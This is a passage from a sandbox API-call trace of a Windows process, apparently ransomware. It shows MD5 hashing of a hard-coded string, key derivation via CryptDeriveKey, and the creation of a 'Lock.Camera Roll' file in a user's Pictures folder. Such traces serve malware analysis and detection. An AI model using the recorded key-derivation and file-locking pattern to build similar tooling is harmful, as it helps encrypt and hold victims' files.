returned 0 [0209.128] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.128] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.128] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.128] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.128] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.128] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.128] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.128] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.128] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab140, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0209.128] CryptCreateHash (in: hProv=0xa7bc48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0209.128] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.128] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.128] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71be8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.129] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0209.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.129] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.129] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.129] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.129] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.129] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.129] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0209.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab260, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0209.129] CryptHashData (hHash=0x9e1c38, pbData=0x2a71d18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0209.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.129] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.129] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.129] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.130] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.130] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.130] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.130] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.130] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.130] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.130] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0209.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab3b0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0209.130] CryptDeriveKey (in: hProv=0xa7bc48, Algid=0x6601, hBaseData=0x9e1c38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2138) returned 1 [0209.130] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.130] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.130] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.130] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.130] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.130] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.130] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.130] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.130] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.130] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.130] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0209.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f60, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0209.131] CryptDestroyHash (hHash=0x9e1c38) returned 1 [0209.131] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.131] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.131] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.131] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.131] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.132] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Camera Roll" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.132] GetLastError () returned 0x5 [0209.132] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0209.132] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0209.133] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0209.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0209.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0209.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a74448 [0209.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.133] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0209.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74448 | out: hHeap=0x2af0000) returned 1 [0209.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0209.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a930 [0209.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0209.134] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.Camera Roll" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.camera roll"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0209.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0209.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.141] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0209.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0209.141] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0209.142] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0209.142] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0209.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.143] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.143] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.143] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b48 [0209.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.144] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0209.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0209.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0209.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0209.144] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, 